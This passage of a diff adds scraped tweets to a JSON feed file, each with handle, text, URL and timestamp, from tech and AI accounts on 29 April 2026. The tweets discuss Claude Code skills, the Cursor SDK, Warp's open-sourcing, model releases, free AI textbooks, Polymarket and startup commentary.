的Skill做了节省token的优化处理方案。评论区拿skill", + "url": "https://x.com/CuiMao/status/2049529746279796864", + "published_at": "2026-04-29T16:42:24+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never materialize.", + "url": "https://x.com/liuliu/status/2049526702334972397", + "published_at": "2026-04-29T16:30:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "君子生非异也,善假于 AI 也。\n— A子", + "url": "https://x.com/0xAA_Science/status/2049525966628958553", + "published_at": "2026-04-29T16:27:23+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "到香港后发现带的是大陆转英标的插座,崩溃", + "url": "https://x.com/Stv_Lynn/status/2049522162411995640", + "published_at": "2026-04-29T16:12:16+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download.\n\nAvailable globally for all @GeminiApp users.", + "url": "https://x.com/JeffDean/status/2049519281600373159", + "published_at": "2026-04-29T16:00:49+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "刚好今天下午跟团队开会,聊到了 Symphony。\n\n过去这段时间团队手搓了一套系统,想解决一个很现实的问题:\n别再让产品和技术被各自的工具链锁住了。\n\n现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效率也不稳定。\n\n这个平台做的事情很简单粗暴,要把这些能力收敛到同一套平台里,让 coding 从人驱动工具切换变成 Agent 任务驱动。\n\n今天刚好讨论的一个关键点就是任务要用 Symphony 串起来。\n\n什么意思?\n\n就是以后团队里任何一个人,只要不颠覆大的设计目标,都可以直接提需求 → AI 自动拆解 → 自动构建 → 自动交付初版。\n\n所有人要做的事情只剩两件,提需求、验证、兜底。\n\n你可能会说,OpenAI、Authoropic 这些公司已经这么干了,但其实对于我们来说,现阶段可能刚刚好。\n\n现状是开发到提测这个流程是没什么问题了,接下来我们打算把产品也收到这里边来,测试也尝试对接进来,看看到底能走到一哪一步。", + "url": "https://x.com/frxiaobei/status/2049516252281135554", + "published_at": "2026-04-29T15:48:47+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "今天才发现自己 80.8% 的 Claude Code skill 是装废的。\n\n读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。\n\n52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。\n\n今天全改成 Use when + NOT when,1-2 周后回来对账。👀", + "url": "https://x.com/runes_leo/status/2049513537966674317", + "published_at": "2026-04-29T15:38:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today.\n\nHugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash\nModelScope: https://modelscope.cn/models/inclusionAI/Ling-2.6-flash\n\nDeploy on your own devices: https://recipes.vllm.ai/inclusionAI/Ling-2.6-flash?hardware=h200", + "url": "https://x.com/dingyi/status/2049507438156787936", + "published_at": "2026-04-29T15:13:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do Rich Founders Make For Bigger Exits:\n\n\"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash.\n\nHad I not had the singles before, it might have been something that was very enticing to just cash out the whole thing at that point in time.\n\nBut because I knew my bank account was sound, I wasn't in it for money. I was trying to build big and really I felt like this had to be the home run.\" Adam Foroughi, @AppLovin\n\nHave you found that founders with prior wealth are correlated with larger exits due to their ability to go big @chadbyers @semil @honam @pitdesi?", + "url": "https://x.com/HarryStebbings/status/2049504982261714970", + "published_at": "2026-04-29T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?", + "url": "https://x.com/lxfater/status/2049501643071180855", + "published_at": "2026-04-29T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codebases.\n\nLearn more: http://cursor.com/blog/typescript-sdk", + "url": "https://x.com/cursor_ai/status/2049499876388454903", + "published_at": "2026-04-29T14:43:43+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board.\n\nUse Cursor to customize them for your use case:\nhttp://github.com/cursor/cookbook", + "url": "https://x.com/cursor_ai/status/2049499874043830389", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.", + "url": "https://x.com/cursor_ai/status/2049499871980200082", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/frxiaobei/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i meant a goblin moment, sorry", + "url": "https://x.com/sama/status/2049493797114126484", + "published_at": "2026-04-29T14:19:33+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech.\n\nHe started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience and going on to found DeepMind. His lab cracked Go, solved protein structure prediction with AlphaFold, and then gave it away free to every scientist on earth. That work won him the 2024 Nobel Prize in Chemistry. Today he leads @GoogleDeepMind, pushing toward the same goal he set as a teenager: AGI. \n\nOn this special live episode of How to Build the Future, he sat down with YC's @garrytan to talk about what still needs to happen to get us to AGI, his advice for founders on how to stay ahead of the curve, and what the next big scientific breakthroughs might be.\n\n01:48 — What’s Missing Before We Get To AGI?\n03:36 — Why Memory Is Still Unsolved\n06:14 — How AlphaGo Shaped Gemini\n08:06 — Why Smaller Models Are Getting So Powerful\n10:46 — The 1000x Engineer\n12:40 — Continual Learning and the Future of Agents\n13:32 — Why AI Still Fails at Basic Reasoning\n15:33 — Are Agents Overhyped or Just Getting Started?\n18:31 — Can AI Become Truly Creative?\n20:26 — Open Models, Gemma, and Local AI\n22:26 — Why Gemini Was Built Multimodal\n24:08 — What Happens When Inference Gets Cheap?\n25:24 — From AlphaFold to the Virtual Cells\n28:24 — AI as the Ultimate Tool for Science\n30:43 — Advice for Founders\n33:30 — The AlphaFold Breakthrough Pattern\n35:20 — Can AI Make Real Scientific Discoveries?\n37:59 — What to Build Before AGI Arrives", + "url": "https://x.com/paulg/status/2049489217953374689", + "published_at": "2026-04-29T14:01:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。", + "url": "https://x.com/CuiMao/status/2049480920001114551", + "published_at": "2026-04-29T13:28:23+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。\n\n本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。\n\n我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。\n\n之前我把 Cursor 这个 loop 当成\"独立的产物 worker\"——跑批量产物(spec / outline / copy),跟 Claude / Codex 各干各的,专业分工。\n\n今天被自己打回重写。\n\nCursor 后端就有 claude-4.7 + gpt-5.5 模型,本来就能干 Claude / Codex 的活。目前感觉适合自己系统的角色是\"前置助理\"——研究 / 初稿 / 批量改 / 审计扫描这些前置部分给它跑,主线(白天我 + 夜间 Codex loop)只做最后一公里的判断和定稿。\n\n这份算力放在\"前置\"位置,给主线省 token,整个工作流的密度都拉起来。比让它孤立产物值多了。\n\n通用模式不止 Cursor:\n- ChatGPT 重度用户 → GPT-4o-mini 跑前置 → GPT-5 主线判断\n- Claude Code 重度用户 → Haiku subagent 跑前置 → Opus 主线判断\n- 任何多模型工作流 → 把便宜模型放在贵模型主线之前\n\n把贵的留在最后一公里。\n\n5/31 之前还有 32 天。接下来我计划逐渐让它融入我的主要工作流程。", + "url": "https://x.com/runes_leo/status/2049477802978664657", + "published_at": "2026-04-29T13:16:00+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Github and critical work are becoming incompatible", + "url": "https://x.com/soumithchintala/status/2049475649157374146", + "published_at": "2026-04-29T13:07:26+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。\n\n建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: \nhttps://t.me/+ZCnxv1CA0u5jMmU1", + "url": "https://x.com/0xAA_Science/status/2049462724216987766", + "published_at": "2026-04-29T12:16:05+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is a task, not a job, and when the task gets cheaper, demand for the job grows.\"", + "url": "https://x.com/ylecun/status/2049456071278747804", + "published_at": "2026-04-29T11:49:39+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Polymarket V2 cutover 24 小时观察。\n\n把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。\n\n---\n\n【数据层】@lnkybtc 秋田老师的链上数据最直观:\n\n• V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址\n• 6 小时内,PM TVL 4.5 亿里有 2 亿(40%)转成了 pUSD\n• 利息原本上交 Circle,现在 PM 自己拿——2028 大选 4% 年化补贴的资金来源问题解决了\n• 但代价是:链上协议独立性解除,pUSD 和 PM 链下信用强绑定(V1 时代你能自己 merge 回 USDC,PM 停摆也不影响)\n\n---\n\n【实操层】我自己社群(http://t.me/runesgang)24h 真实痛点:\n\n技术派:\n• \"V2 的 SDK 识别不到 pUSD\"\n• \"前端已经 pusd 了,后端 redeem 还是 usdce\"——前后端口径不一致\n• merge() 老仓位还得走 USDC.e 中转,不能直接出 pUSD\n\n困惑派:\n• \"这个 pusd 到底是干嘛的我都搞不懂了\"\n• \"非包装一层 pusd 有啥好处\"\n• \"那这 V2 升的点用没有\"\n\n少数正面:\n• \"V2 跑起来感觉好多了\"(撮合延迟、签名都顺了)\n\n---\n\n【判断】\n\n工程方向是对的(pUSD 原生化 + EIP-712 标准化 + 砍掉 nonce 攻击面),产品节奏猛了点——从公告到强制迁移 < 72h。\n\n链上数字漂亮(4 小时 1.7 亿 pUSD),社群一片懵逼(\"包一层有啥好处\"),中间差着几天工程消化期。\n\n官方有这个动作,搞策略的顺着规则走——该调整就调整,正常推进策略迭代,后续持续关注变化。\n\nhttps://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=v2-cutover-observation&v…", + "url": "https://x.com/runes_leo/status/2049450372285046792", + "published_at": "2026-04-29T11:27:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic ships changelogs. OpenAI ships vibes.", + "url": "https://x.com/runes_leo/status/2049438052310020226", + "published_at": "2026-04-29T10:38:03+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二,\"终端 → 开发环境平台\"这个转型挺有意思。Cursor 从编辑器起家往下卷,Warp 从终端起家往上走,两边都在做同一件事:把 IDE、终端、Agent 折叠成一个东西。\n\n第三,开放接入别人的 Agent 是聪明的一手。自己内置一套,但承认你可能更想用 Claude Code 或者 Codex。开门做,比关门打有意思。\n\n对个人开发者来说,以前的标配是 iTerm + Cursor + Claude Code 三件套来回切,现在一个 Warp 就够了。\n\nhttp://github.com/warpdotdev/warp", + "url": "https://x.com/bozhou_ai/status/2049436870963085429", + "published_at": "2026-04-29T10:33:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Machine Learning Part 2(Kevin Murphy):概率视角下的 ML 高级篇\nhttps://probml.github.io/pml-book/book2.html\n\n【深度学习】\n\n4. Deep Learning(Goodfellow/Bengio/Courville):业内俗称\"花书\"\nhttps://www.deeplearningbook.org/\n\n5. Understanding Deep Learning(Simon Prince):2025 新版,配 Python notebook,比花书更新更友好\nhttps://udlbook.github.io/udlbook/\n\n【强化学习】\n\n6. Reinforcement Learning: An Introduction(Sutton & Barto):RL 圣经,做 Agent 必看\nhttp://incompleteideas.net/book/the-book-2nd.html\n\n7. Distributional Reinforcement Learning:第一本系统讲分布式 RL 的教材\nhttps://www.distributional-rl.org/\n\n8. Multi-Agent Reinforcement Learning:多 Agent 协作完整入门\nhttps://www.marl-book.com/\n\n【应用与工程】\n\n9. Foundations of Computer Vision(Torralba 等):现代 CV 全景图\nhttps://visionbook.mit.edu/\n\n10. Machine Learning Systems:ML 模型的系统工程化\nhttps://mlsysbook.ai/\n\n11. Machine Learning in Production:从模型到真正的产品\nhttps://mlip-cmu.github.io/book/\n\n12. Fairness and Machine Learning:AI 公平性问题\nhttps://fairmlbook.org/\n\n啃下来需要一点数学和编程基础。如果你只是想\"了解 AI\",这些书太硬,去找科普书更合适。但要真搞懂 AI 是怎么回事的人,看这些比看 100 篇科普文章都管用。", + "url": "https://x.com/bozhou_ai/status/2049436668663390575", + "published_at": "2026-04-29T10:32:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker 该有的样子。", + "url": "https://x.com/runes_leo/status/2049423498494566836", + "published_at": "2026-04-29T09:40:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", + "url": "https://x.com/dingyi/status/2049423162933395583", + "published_at": "2026-04-29T09:38:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.", + "url": "https://x.com/paulg/status/2049419661855338641", + "published_at": "2026-04-29T09:24:58+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": "https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so you control dilution.\"\n\nTo what extent is SBC the crux of the problem and has it ever been a better time to be a founder or operator given this @honam @infoarbitrage @paulbonnet @markpinc", + "url": "https://x.com/HarryStebbings/status/2049298621951058341", + "published_at": "2026-04-29T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: - Comey indicted for tweeting a number.\n- Trump FCC threatens ABC's broadcast license.\n- Trump defacing more govt institutions with his name and picture.\n- Trump's kids cashing in on huge govt contracts.\n\nI'm always torn on whether to speak up on the daily drumbeat of Trump's creepy, corrupt, Putin-style authoritarianism. \n\nOn the one hand, this has become so standard under Trump, and everyone's opinions on him have long hardened, so why bother? Just keep your head down, post on economic policy (what happened to Econ Twitter?), and don't be distracted by the daily news cycle outrages. That's the standard position in DC policy circles.\n\nOn the other hand, isn't this defeatist passivity how authoritarianism thrives? Government actions that would have induced a nationwide backlash 15 years ago are now just the day's background noise. So the bar moves.\n\nIt’s a familiar path: Most authoritarian nations moved there gradually yet persistently - the govt commits some outrages, waits for the public to get used to it and stop complaining, and then pushes for the next round. Authoritarian governments count on the population having a short attention span while they steadily boil the frog. But when you think about how far Trump has pushed just in the last 15 months, it’s fair to wonder where we'll be after the next 33 months of his term.\n\nSo I’ve been torn - speaking up a lot during the ICE protests, then just focusing on econ for many weeks. I don’t want to bore people who’ve all made up their minds on what is happening in this country - and I've been trying to spend less time on this toxic hellsite for my own mental health.\n\nBut I also think us trying to be all cool and above-the-fray is exactly what gives the administration the green light to once again push harder towards corrupt, statist, personality-cult Putinism. I don’t really have an answer here. Although this being Twitter, I’m sure that any possible approach (whether passive, hair-on-fire, or in-between) will inevitably get me yelled at here.", + "url": "https://x.com/ylecun/status/2049290206923382906", + "published_at": "2026-04-29T00:50:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", + "url": "https://x.com/svwang1/status/2049289806241550791", + "published_at": "2026-04-29T00:48:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on this history https://www.youtube.com/watch?v=9B4kkaGOozA&t=3891s", + "url": "https://x.com/ylecun/status/2049272044504936685", + "published_at": "2026-04-28T23:38:23+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": 